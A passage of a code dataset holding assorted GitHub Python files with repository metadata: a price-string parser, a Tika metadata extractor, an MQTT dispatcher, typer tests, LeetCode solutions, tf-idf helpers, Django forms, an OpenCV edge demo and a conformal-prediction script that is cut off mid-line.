redirect('orders_list')\n","repo_name":"effectmaks/auto_order","sub_path":"auto/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9092078495","text":"import csv\nimport re\nfrom numpy import mean\n\n\ndef write_csv(data):\n with open('result.csv', 'a') as file:\n writer = csv.writer(file)\n writer.writerow((data['string'], data['type'], data['price']))\n\n\ndef refined_k(s):\n print(s)\n print('k')\n # $ 450K FIXED PRICE 20 SQS HOME 4 BEDS\n pattern_k = '\\d+[kK]'\n r = re.findall(pattern_k, s)\n return r[0].lower().replace('k', '000')\n\n\ndef refined_m(s):\n print(s)\n print('m')\n pattern_m = '\\d+[mM]\\D'\n r = re.findall(pattern_m, s)\n print(r)\n r0 = r[0].replace('.', '')\n print(int(r0.lower().replace('m', '000000')))\n # , int(r[1])\n # avg = mean(a)\n # return avg\n\n\ndef refined_perc(s):\n print('perc')\n print(s)\n # $1,020,000 with 8% rental return\n pattern_k = '\\d+[%]'\n r = s.replace('.', '')\n r = r.replace(re.findall(pattern_k, r)[0], '')\n return refined_digit(r.replace(',', ''))[0]\n\n\ndef refined_aver(s):\n print('aver')\n print(s)\n pattern_k = '\\d+'\n\n r = re.findall(pattern_k, s.replace(',', ''))\n res = []\n for i in r:\n print(type(i))\n res.append(int(i))\n print(type(r[0]))\n res = mean(r)\n print(res)\n return res\n # r = r.replace(re.findall(pattern_k, r)[0], '')\n # return refined_digit(r.replace(',', ''))[0]\n\n\ndef refined_digit(s):\n pattern = r'\\d+'\n r = re.findall(pattern, s)\n return r\n\n\ndef main():\n with open('strings1.csv') as file:\n order = ['string', 'type', 'price']\n reader = csv.DictReader(file, fieldnames=order)\n pattern_None = '\\d[\\']'\n pattern_million = 'million'\n pattern_k = '\\d[kK]'\n # pattern_m = '\\d[mM][\\D][^\\']'\n pattern_perc = '\\d[%]'\n pattern_aver = '\\d+[^%km]'\n # patterm_difference =\n for r in reader:\n if re.search(pattern_None, r['string']):\n print(r['string'])\n print(\"None_\")\n elif re.search(pattern_million, r['string']):\n print(r['string'])\n print('million_')\n elif re.search(pattern_k, r['string']):\n print(r['string'])\n print(refined_k(r['string']))\n elif re.search(pattern_perc, r['string']):\n print(r['string'])\n print(refined_perc(r['string']))\n # elif re.search(pattern_m, r['string']):\n # print(refined_m(r['string']))\n elif re.search(pattern_aver, r['string']):\n print(r['string'])\n print(refined_aver(r['string']))\n else:\n print('else ' + str(r))\n\n\nif __name__ == '__main__':\n main()","repo_name":"kalilask4/parsers","sub_path":"ex2_get_ int_ price/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23443214877","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nimport re\nimport os\nimport json\n\n\nimport gransk.core.helper as helper\nimport gransk.core.abstract_subscriber as abstract_subscriber\nimport six\n\n\nclass Subscriber(abstract_subscriber.Subscriber):\n \"\"\"Class for extracting metadata from documents using Apache Tika.\"\"\"\n CONSUMES = [helper.EXTRACT_META]\n\n def setup(self, config):\n \"\"\"\n Load mediatype mapping from file. This is used to determine document type.\n\n :param config: Configuration object.\n :type config: ``dict``\n \"\"\"\n self.config = config\n typecache = {}\n media_path = os.path.join(\n config[helper.CODE_ROOT], 'utils', 'media_types.txt')\n\n with open(media_path) as inp:\n current = None\n for line in inp:\n if len(line.strip()) == 0 or line.startswith('#'):\n continue\n\n if line.strip().startswith('-'):\n apptype = line.strip().partition('-')[2]\n apptype = apptype.strip()\n typecache[current].append(re.escape(apptype))\n else:\n current = line.strip()\n typecache[current] = []\n\n pattern_list = []\n\n for _type, patterns in typecache.items():\n pattern_list.append(u'(?P<%s>(%s))' % (_type, u'|'.join(patterns)))\n\n self.typepattern = re.compile(u'|'.join(pattern_list), re.I)\n\n def __extract_metadata(self, doc, payload):\n filename = os.path.basename(doc.path).encode('utf-8')\n files = {\n 'Accept': 'application/json',\n 'Content-Disposition': 'attachment; filename=%s' % filename\n }\n\n payload.seek(0)\n connection = self.config[helper.INJECTOR].get_http_connection()\n connection.request('PUT', '/meta', payload.read(), files)\n payload.seek(0)\n\n response = connection.getresponse()\n\n result = json.loads(response.read().decode('utf-8'))\n\n response.close()\n\n return result\n\n def consume(self, doc, payload):\n \"\"\"\n Upload document to Apache Tika and parse results.\n\n :param doc: Document object.\n :param payload: File pointer beloning to document.\n :type doc: ``gransk.core.document.Document``\n :type payload: ``file``\n \"\"\"\n meta = {}\n\n max_size = self.config.get(helper.MAX_FILE_SIZE, 0)\n\n if max_size > 0 and doc.meta['size'] > max_size:\n return\n\n try:\n meta = self.__extract_metadata(doc, payload)\n application_type = meta.get(u'Content-Type')\n for match in self.typepattern.finditer(application_type):\n doc.set_type(match.lastgroup)\n except Exception as err:\n doc.meta['meta_error'] = six.text_type(err)\n\n for key, value in meta.items():\n doc.meta[key.replace('.', '_').replace(':', '_')] = value\n","repo_name":"toshisam/gransk","sub_path":"gransk/plugins/extractors/file_meta.py","file_name":"file_meta.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"630688465","text":"from typing import List\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n noOfIslands = 0\n\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if grid[i][j] == '1':\n self.markIsland(grid, i, j)\n noOfIslands += 1\n\n return noOfIslands\n\n def markIsland(self, grid, i, j):\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]) or grid[i][j] != '1':\n return\n\n grid[i][j] = '2'\n\n self.markIsland(grid, i + 1, j)\n self.markIsland(grid, i - 1, j)\n self.markIsland(grid, i, j + 1)\n self.markIsland(grid, i, j - 1)\n\n\nsolution = Solution()\ngrid1 = [[\"1\", \"1\", \"1\", \"1\", \"0\"], [\"1\", \"1\", \"0\", \"1\", \"0\"], [\"1\", \"1\", \"0\", \"0\", \"0\"], [\"0\", \"0\", \"0\", \"0\", \"0\"]]\ngrid2 = [[\"1\",\"1\",\"0\",\"0\",\"0\"], [\"1\",\"1\",\"0\",\"0\",\"0\"], [\"0\",\"0\",\"1\",\"0\",\"0\"], [\"0\",\"0\",\"0\",\"1\",\"1\"]]\nassert solution.numIslands(grid1) == 1\nassert solution.numIslands(grid2) == 3","repo_name":"kalyansikdar/LeetCode","sub_path":"Graph/DFS/NumberOfIslands.py","file_name":"NumberOfIslands.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6684525393","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport uuid\nimport json\nimport gmqtt\nimport asyncio\nimport signal\nimport logging\nimport falcon\nimport falcon_jsonify\nimport time\n\nfrom chariot_base.connector import LocalConnector\n\nfrom chariot_northbound_dispatcher import __service_name_listener__\nfrom chariot_northbound_dispatcher.dispatcher import Dispatcher\nfrom chariot_base.utilities import open_config_file, Tracer\nfrom chariot_base.connector import LocalConnector, create_client\n\n\nclass SouthboundConnector(LocalConnector):\n def __init__(self, options):\n super(SouthboundConnector, self).__init__()\n self.dispatcher = None\n\n def on_message(self, client, topic, payload, qos, properties):\n msg = payload.decode('utf-8')\n deserialized_model = json.loads(msg)\n logging.debug(f'Receive messages: {deserialized_model}')\n span = self.start_span_from_message('on_message', deserialized_model)\n try:\n self.dispatcher.forward(deserialized_model, span)\n self.close_span(span)\n except Exception as ex:\n self.error(span, ex)\n self.close_span(span)\n logging.error(ex)\n\n def inject_dispatcher(self, dispatcher):\n self.dispatcher = dispatcher\n\n def on_connect(self, client, flags, rc, properties=None):\n self.connected = True\n self.connack = (flags, rc, properties)\n if rc == 0:\n self.subscribe_to_topics()\n\n def set_topics(self, topics):\n self.topics = topics\n\n def subscribe_to_topics(self):\n subscriptions = []\n for topic in self.topics:\n subscriptions.append(gmqtt.Subscription(topic, qos=1))\n self.client.subscribe(subscriptions, subscription_identifier=2)\n logging.info('Waiting for raised alerts...')\n\nclass NorthboundConnector(LocalConnector):\n def __init__(self, options):\n super(NorthboundConnector, self).__init__()\n\n\nSTOP = asyncio.Event()\n\n\ndef ask_exit(*args):\n logging.info('Stoping....')\n STOP.set()\n\n\nasync def main(args=None):\n\n opts = open_config_file()\n\n options_engine = opts.northbound_dispatcher\n options_tracer = opts.tracer\n\n tracer = None\n if options_tracer['enabled']:\n options_tracer['service'] = __service_name_listener__\n logging.debug(f'Enabling tracing for service \"{__service_name_listener__}\"')\n tracer = Tracer(options_tracer)\n tracer.init_tracer()\n\n southbound = SouthboundConnector(options_engine)\n southbound.inject_tracer(tracer)\n client_south = await create_client(opts.brokers.southbound)\n southbound.register_for_client(client_south)\n\n northbound = NorthboundConnector(options_engine)\n northbound.inject_tracer(tracer)\n client_north = await create_client(opts.brokers.northbound)\n northbound.register_for_client(client_north)\n\n dispatcher = Dispatcher(options_engine)\n southbound.inject_dispatcher(dispatcher)\n dispatcher.inject(southbound, northbound)\n dispatcher.inject_tracer(tracer)\n\n dispatcher.subscribe_to_southbound()\n\n logging.info('Waiting message from Privacy Engine')\n await STOP.wait()\n await client_south.disconnect()\n await client_north.disconnect()\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n\n loop.add_signal_handler(signal.SIGINT, ask_exit)\n loop.add_signal_handler(signal.SIGTERM, ask_exit)\n\n loop.run_until_complete(main())\n logging.info('Stopped....')","repo_name":"charIoT-h2020/chariot-northbound-dispatcher","sub_path":"chariot_northbound_dispatcher/digester.py","file_name":"digester.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26721361618","text":"import subprocess\n\nimport typer_cloup as typer\nfrom docs_src.parameter_types.enum import tutorial001 as mod\nfrom typer_cloup.testing import CliRunner\n\nrunner = CliRunner()\n\napp = typer.Typer()\napp.command()(mod.main)\n\n\ndef test_help():\n result = runner.invoke(app, [\"--help\"])\n assert result.exit_code == 0\n assert \"--network [simple|conv|lstm]\" in result.output\n\n\ndef test_main():\n result = runner.invoke(app, [\"--network\", \"conv\"])\n assert result.exit_code == 0\n assert \"Training neural network of type: conv\" in result.output\n\n\ndef test_invalid():\n result = runner.invoke(app, [\"--network\", \"capsule\"])\n assert result.exit_code != 0\n assert (\n \"Error: Invalid value for '--network': 'capsule' is not one of 'simple', 'conv', 'lstm'\"\n in result.output\n )\n\n\ndef test_script():\n result = subprocess.run(\n [\"coverage\", \"run\", mod.__file__, \"--help\"],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n encoding=\"utf-8\",\n )\n assert \"Usage\" in result.stdout\n","repo_name":"alexreg/typer-cloup","sub_path":"tests/test_tutorial/test_parameter_types/test_enum/test_tutorial001.py","file_name":"test_tutorial001.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"22081065830","text":"class Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n \n d={}\n for i in range(len(order)):\n d[order[i]] = i\n \n for i in range(1, len(words)):\n # word1 = words[i-1]\n # word2 = words[i]\n smaller = len(words[i-1]) if len(words[i-1]) < len(words[i]) else len(words[i])\n areSame = True\n for j in range(smaller):\n diff = d[words[i][j]] - d[words[i-1][j]]\n if diff < 0: \n return False\n if diff > 0: \n areSame = False\n break\n \n if areSame and len(words[i]) < len(words[i-1]):\n return False\n \n return True\n \n \n \n \n \n \n\n# areSame = True\n# for item in letters:\n# diff = d[item[0]] - d[item[1]]\n# if diff < 0:\n# return False\n# if diff > 0:\n# areSame = False","repo_name":"umarf2212/LeetCode","sub_path":"problems/verifying_an_alien_dictionary/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"589456143","text":"import math\n\n# use by the tf function\ndef max_term_in_d(d_terms_list):\n return max([d_terms_list.count(i) / len(d_terms_list) for i in d_terms_list])\n\ndef tf(term,d_terms_list):\n return 0.5 + 0.5 * ((d_terms_list.count(term)/ len(d_terms_list)) / max_term_in_d(d_terms_list))\n\n# use by the idf function\ndef num_docs_has_the_term(term,list_of_document):\n count = 0\n for i in list_of_document:\n if term in i:\n count += 1\n return count\n\ndef idf(term,list_of_documents):\n if num_docs_has_the_term(term,list_of_documents):\n return math.log(len(list_of_documents) / num_docs_has_the_term(term,list_of_documents))\n\n\ndef tfidf(t,d,D):\n if idf(t,D):\n return tf(t,d) * idf(t,D)\n else: return 0\n\n\n\n\"\"\"\nif you get a list of docs of terms - this function return the average of tf-idf score of specific term in all labels docs \n\"\"\"\ndef calculate_tfidf_with_averege(docs_label,all_docs,label):\n score_shits = {}\n for doc in docs_label:\n for term in doc:\n # to insert score for one term only once for a document\n checked = []\n if term not in checked:\n if term not in score_shits.keys():\n score_shits[term] = {'label': label, 'score': 0, 'counter': 0}\n score_shits[term]['score'] += tfidf(term, doc, all_docs)\n score_shits[term]['counter'] += 1\n checked.append(term)\n # calc the averege\n for term in score_shits:\n score_shits[term]['score'] /= score_shits[term]['counter']\n return score_shits\n\n","repo_name":"avratech7/CORE","sub_path":"Algorithem_Porush.py","file_name":"Algorithem_Porush.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34645143980","text":"print()\nprint('Foram anotadas as idades e alturas de 30 alunos. Faça um Programa que determine')\nprint('quantos alunos com mais de 13 anos possuem altura inferior à média de altura desses alunos.')\nprint()\nprint('-=' * 30)\nperfil = [1.70, 14, 1.60, 12, 1.65, 11, 1.80, 15, 1.58, 14, 1.62, 12, 1.53, 11, 1.72, 14, 1.50, 8, 1.60, 14]\nalturas = []\nv = 1\nfor c in range(1, 11):\n if perfil[v] > 13:\n alturas.append(perfil[v - 1])\n v += 2\nprint(alturas)\nsoma = 0\ng = 0\nfor c in range(1, 11):\n soma += perfil[g]\n g += 2\nmedia = soma / 10\n\nalunos_menor = 0\nfor c in alturas:\n if c < media:\n alunos_menor += 1\nprint(f'O total de {alunos_menor} com mais de 13 anos, estao com alturas inferiores a media')","repo_name":"Felipecard/Codigos-Exercicios-Python","sub_path":"4. Listas/Alunos com certa idade, a baixo da altura.py","file_name":"Alunos com certa idade, a baixo da altura.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34557482350","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import validate_image_file_extension\n\nfrom kitchen.models import Cook, Dish\n\n\nclass CookCreationForm(UserCreationForm):\n\n class Meta(UserCreationForm.Meta):\n model = Cook\n fields = UserCreationForm.Meta.fields + (\n \"first_name\",\n \"last_name\",\n \"email\",\n \"years_of_experience\",\n\n )\n\n\nclass DishForm(forms.ModelForm):\n cooks = forms.ModelMultipleChoiceField(\n queryset=get_user_model().objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False\n )\n dish_image = forms.ImageField(\n validators=[validate_image_file_extension],\n required=False\n )\n\n class Meta:\n model = Dish\n fields = \"__all__\"\n\n def clean_price(self):\n price = self.cleaned_data[\"price\"]\n\n if price < 0:\n raise ValidationError(\"Price must be greater than 0.\")\n\n return price\n\n\nclass DishTypeSearchForm(forms.Form):\n name = forms.CharField(\n max_length=255,\n required=False,\n label=\"\",\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by name...\"})\n )\n\n\nclass DishSearchForm(forms.Form):\n name = forms.CharField(\n max_length=255,\n required=False,\n label=\"\",\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by name...\"})\n )\n\n\nclass CookSearchForm(forms.Form):\n username = forms.CharField(\n max_length=255,\n required=False,\n label=\"\",\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by username...\"})\n )\n","repo_name":"alina-boichenko/restaurant_kitchen_service","sub_path":"kitchen/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4185735919","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimage = cv2.imread('./public/images/image.jpeg', cv2.IMREAD_GRAYSCALE)\n\nedges_canny = cv2.Canny(image,100,200)\n\nplt.figure(figsize=(10,5))\nplt.subplot(121), plt.imshow(image, cmap='gray')\nplt.title('Orijinal Görüntü'), plt.axis('off')\nplt.subplot(122), plt.imshow(edges_canny, cmap='gray')\nplt.title('Canny Kenar Dedektörü'), plt.axis('off')\nplt.show()","repo_name":"muratgulcan/opencv_playground","sub_path":"tests/opencv_lesson8_canny.py","file_name":"opencv_lesson8_canny.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18435976099","text":"\"\"\"\r\nSCRIPT FOR APPLYING SINGLE-TARGET CONFORMAL REGRESSION\r\nWITH A SINGLE-TARGET UNDERLYING MODEL\r\n\"\"\"\r\n\r\n# Authors: Mateusz Wiza\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.linear_model import Lasso, Ridge\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom nonconformist.base import RegressorAdapter\r\nfrom nonconformist.icp import IcpRegressor\r\nfrom nonconformist.nc import RegressorNc, AbsErrorErrFunc, RegressorNormalizer\r\nfrom nonconformist.evaluation import cross_val_score\r\nfrom nonconformist.evaluation import RegIcpCvHelper\r\nfrom nonconformist.evaluation import reg_mean_errors, reg_median_size, reg_q3_size, reg_q1_size\r\n\r\n\r\ndef apply_cp(features, target, underlying):\r\n \"\"\"Perform not-normalized conformal prediction.\r\n Parameters\r\n ----------\r\n features : numpy array of shape [n_samples, n_features]\r\n Features of each sample\r\n target : numpy array of shape [n_samples]\r\n True output labels of each sample.\r\n underlying : model implementing fit() and predict()\r\n Underlying model for conformal prediction.\r\n Returns\r\n -------\r\n Results cross_val_score() from averaged from the 4 iterations\r\n of cross validation.\r\n \"\"\"\r\n # Adapt underlying model for conformal prediction\r\n u_model = RegressorAdapter(underlying)\r\n # Define the nonconformity function\r\n ncs = RegressorNc(u_model, AbsErrorErrFunc())\r\n # Initialize inductive conformal regressor\r\n icp = IcpRegressor(ncs)\r\n\r\n # Perform cross validation\r\n scores = cross_val_score(RegIcpCvHelper(icp),\r\n features,\r\n target,\r\n iterations=4,\r\n folds=10,\r\n scoring_funcs=[reg_mean_errors, reg_median_size, reg_q1_size, reg_q3_size],\r\n significance_levels=[0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Return results averaged from the 4 iterations of cross validation\r\n return scores.groupby(['significance']).mean()\r\n\r\n\r\ndef apply_norm_cp(features, target, underlying, normalizing):\r\n \"\"\"Perform normalized conformal prediction.\r\n Parameters\r\n ----------\r\n features : numpy array of shape [n_samples, n_features]\r\n Features of each sample\r\n target : numpy array of shape [n_samples]\r\n True output labels of each sample.\r\n underlying : model implementing fit() and predict()\r\n Underlying model for conformal prediction.\r\n normalizing : model implementing fit() and predict()\r\n Normalizing model for conformal prediction.\r\n Returns\r\n -------\r\n Results cross_val_score() from averaged from the 4 iterations\r\n of cross validation.\r\n \"\"\"\r\n # Adapt underlying and normalizing models for conformal prediction\r\n u_model = RegressorAdapter(underlying)\r\n n_model = RegressorAdapter(normalizing)\r\n # Initialize the normalizing model\r\n normalizer = RegressorNormalizer(u_model, n_model, AbsErrorErrFunc())\r\n # Define the nonconformity function\r\n ncs = RegressorNc(u_model, AbsErrorErrFunc(), normalizer)\r\n # Initialize inductive conformal regressor\r\n icp = IcpRegressor(ncs)\r\n\r\n # Perform cross validation\r\n scores = cross_val_score(RegIcpCvHelper(icp),\r\n features,\r\n target,\r\n iterations=4,\r\n folds=10,\r\n scoring_funcs=[reg_mean_errors, reg_median_size, reg_q1_size, reg_q3_size],\r\n significance_levels=[0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Return results averaged from the 4 iterations of cross validation\r\n return scores.groupby(['significance']).mean()\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n# PREPARE DATA\r\n# -----------------------------------------------------------------------------\r\n\r\n# Read data from CSV\r\ndata = pd.read_csv(\"data.csv\", sep=',', encoding='latin-1')\r\n\r\n# Transform categorical variable 'Country' into dummy variables\r\ndummy_country = data['country'].str.get_dummies()\r\ndata = pd.concat([data, dummy_country], axis=1)\r\n\r\n# Remove outliers\r\ndata = data[data['STP_hours'] < 8000]\r\ndata = data[data['avg_dur'] < 15]\r\ndata = data[data['daily_occ_stp'] > 0]\r\ndata = data[data['daily_occ_stp'] < 1]\r\ndata = data[data['rev_adj'] > 0]\r\ndata = data[data['rev_adj'] < 10000]\r\n\r\n# Select features / inputs\r\ndata_input = data[\r\n ['Size', 'ts', 'comp', 'spaces', 'office_osm', 'shop_osm', 'food_osm', 'all_osm', 'edu_osm', 'health_osm',\r\n 'hotel_osm', 'ind_osm', 'office', 'BE', 'DE', 'FR', 'GB', 'IE', 'NL']]\r\n\r\n# Select targets / outputs\r\ndata_output = data[['STP_hours', 'avg_dur', 'avg_entry', 'daily_occ_stp', 'rev_adj']]\r\n\r\n# Define input and output matrix\r\nY = np.array(data_output)\r\nX = np.array(data_input)\r\n\r\n# Apply 0-1 normalization to the dataset\r\nscaler = MinMaxScaler()\r\nX = scaler.fit_transform(X)\r\nY = scaler.fit_transform(Y)\r\n\r\n# -----------------------------------------------------------------------------\r\n# EXPERIMENTS USING ONE TARGET TO DETERMINE OPTIMAL SOLUTION\r\n# -----------------------------------------------------------------------------\r\n\r\n# Define significance levels and the 'ideal' width of 10% (for plots)\r\nsignificance = [0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\r\nideal = np.ones(len(significance)) * 10\r\n\r\n# 1. Experiment to determine the best performing underlying model\r\nmodels = [Lasso(alpha=5.0),\r\n Ridge(alpha=5.0),\r\n GradientBoostingRegressor(n_estimators=100, learning_rate=0.1, max_depth=1, random_state=1, loss='ls'),\r\n KNeighborsRegressor(n_neighbors=5),\r\n RandomForestRegressor(random_state=22)]\r\n\r\ndf_exp1 = {}\r\n\r\n# Perform conformal prediction using different models\r\nfor model in models:\r\n df_exp1[str(model)[0:2]] = apply_cp(X, Y[:, 4], model)\r\n\r\n# Plot the results (Fig. 1 in report)\r\nfor df in df_exp1:\r\n data = df_exp1[df]\r\n plt.scatter(data.index, data['reg_median_size'] * 100)\r\n plt.plot(data.index, data['reg_median_size'] * 100)\r\n\r\nplt.plot(significance, ideal, '--', color='k', linewidth=0.5)\r\nplt.ylabel('Interval width [%]')\r\nplt.xlabel('Significance level εₜ')\r\nplt.legend(['Lasso', 'Ridge', 'Gradient Boost', 'k-NN', 'Random Forest'])\r\nplt.show()\r\n\r\n# 2. Experiment to determine the best performing normalizing model\r\nunderlying_model = RandomForestRegressor(random_state=22)\r\nnorm_models = [GradientBoostingRegressor(n_estimators=100, learning_rate=0.1, max_depth=1, random_state=1, loss='ls'),\r\n RandomForestRegressor(random_state=15)]\r\n\r\ndf_exp2 = {}\r\n\r\n# Perform normalized conformal prediction using different normalizing models\r\nfor norm_model in norm_models:\r\n df_exp2[str(norm_model)[0:2]] = apply_norm_cp(X, Y[:, 4], underlying_model, norm_model)\r\n\r\n# Plot the results (Fig. 2 in report)\r\nplt.scatter(data.index, df_exp1['Ra']['reg_median_size'] * 100, color='C4') # Baseline solution\r\nplt.plot(data.index, df_exp1['Ra']['reg_median_size'] * 100, color='C4') # Baseline solution\r\n\r\nfor df in df_exp2:\r\n if df == 'Ra':\r\n c = 'k'\r\n else:\r\n c = 'C8'\r\n data = df_exp2[df]\r\n plt.scatter(data.index, data['reg_median_size'] * 100, color=c)\r\n plt.plot(data.index, data['reg_median_size'] * 100, color=c)\r\n\r\nplt.plot(significance, ideal, '--', color='k', linewidth=0.5)\r\nplt.ylabel('Interval width [%]')\r\nplt.xlabel('Significance level εₜ')\r\nplt.legend(['Not normalized', 'Gradient Boost', 'Random Forest'])\r\nplt.show()\r\n\r\n# -----------------------------------------------------------------------------\r\n# PLOT RESULTS FOR ALL TARGETS USING OPTIMAL BASELINE SOLUTION\r\n# -----------------------------------------------------------------------------\r\nrerun_experiments = False # Set to True to re-run experiments instead of loading results from CSVs\r\n\r\n# Get conformal prediction results by re-running experiments and save to CSV\r\nif rerun_experiments:\r\n normalizing_model = RandomForestRegressor(random_state=15)\r\n\r\n scores_stp = apply_norm_cp(X, Y[:, 0], underlying_model, normalizing_model)\r\n scores_stp.to_csv('graph-data/scores_stp.csv')\r\n\r\n scores_dur = apply_norm_cp(X, Y[:, 1], underlying_model, normalizing_model)\r\n scores_dur.to_csv('graph-data/scores_dur.csv')\r\n\r\n scores_entry = apply_norm_cp(X, Y[:, 2], underlying_model, normalizing_model)\r\n scores_entry.to_csv('graph-data/scores_entry.csv')\r\n\r\n scores_occstp = apply_norm_cp(X, Y[:, 3], underlying_model, normalizing_model)\r\n scores_occstp.to_csv('graph-data/scores_occstp.csv')\r\n\r\n scores_rev = df_exp2['Ra']\r\n scores_rev.to_csv('graph-data/scores_rev.csv')\r\n\r\n# Get conformal prediction results from CSV files\r\nelse:\r\n scores_stp = pd.read_csv(\"graph-data/scores_stp.csv\", sep=',', encoding='latin-1')\r\n scores_dur = pd.read_csv(\"graph-data/scores_dur.csv\", sep=',', encoding='latin-1')\r\n scores_entry = pd.read_csv(\"graph-data/scores_entry.csv\", sep=',', encoding='latin-1')\r\n scores_occstp = pd.read_csv(\"graph-data/scores_occstp.csv\", sep=',', encoding='latin-1')\r\n scores_rev = pd.read_csv(\"graph-data/scores_rev.csv\", sep=',', encoding='latin-1')\r\n\r\n# Plot prediction interval widths (median and IQR)\r\nfig, axs = plt.subplots(nrows=3, ncols=2, figsize=(10, 10))\r\n\r\nax = axs[0, 0]\r\ndiff_q3 = scores_stp['reg_q3_size'] * 100 - scores_stp['reg_median_size'] * 100\r\ndiff_q1 = scores_stp['reg_median_size'] * 100 - scores_stp['reg_q1_size'] * 100\r\nax.errorbar(scores_stp['significance'], scores_stp['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_stp['significance'], scores_stp['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average daily sold parking hours')\r\nax.set_ylabel('Interval width [%]')\r\n\r\nax = axs[0, 1]\r\ndiff_q3 = scores_dur['reg_q3_size'] * 100 - scores_dur['reg_median_size'] * 100\r\ndiff_q1 = scores_dur['reg_median_size'] * 100 - scores_dur['reg_q1_size'] * 100\r\nax.errorbar(scores_dur['significance'], scores_dur['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_dur['significance'], scores_dur['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average duration of stay')\r\n\r\nax = axs[1, 0]\r\ndiff_q3 = scores_entry['reg_q3_size'] * 100 - scores_entry['reg_median_size'] * 100\r\ndiff_q1 = scores_entry['reg_median_size'] * 100 - scores_entry['reg_q1_size'] * 100\r\nax.errorbar(scores_entry['significance'], scores_entry['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_entry['significance'], scores_entry['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average time of entry')\r\nax.set_ylabel('Interval width [%]')\r\n\r\nax = axs[1, 1]\r\ndiff_q3 = scores_occstp['reg_q3_size'] * 100 - scores_occstp['reg_median_size'] * 100\r\ndiff_q1 = scores_occstp['reg_median_size'] * 100 - scores_occstp['reg_q1_size'] * 100\r\nax.errorbar(scores_occstp['significance'], scores_occstp['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_occstp['significance'], scores_occstp['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average daytime occupancy')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nax = axs[2, 0]\r\ndiff_q3 = scores_rev['reg_q3_size'] * 100 - scores_rev['reg_median_size'] * 100\r\ndiff_q1 = scores_rev['reg_median_size'] * 100 - scores_rev['reg_q1_size'] * 100\r\nax.errorbar(scores_rev.index, scores_rev['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_rev.index, scores_rev['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average daily revenue')\r\nax.set_ylabel('Interval width [%]')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nfig.delaxes(axs[2, 1])\r\nfig.suptitle('Tightness of prediction regions per target ')\r\n\r\nplt.show()\r\n\r\n# Plot empirical validity\r\nfig, axs = plt.subplots(nrows=3, ncols=2, sharey=True, figsize=(10, 10))\r\n\r\nax = axs[0, 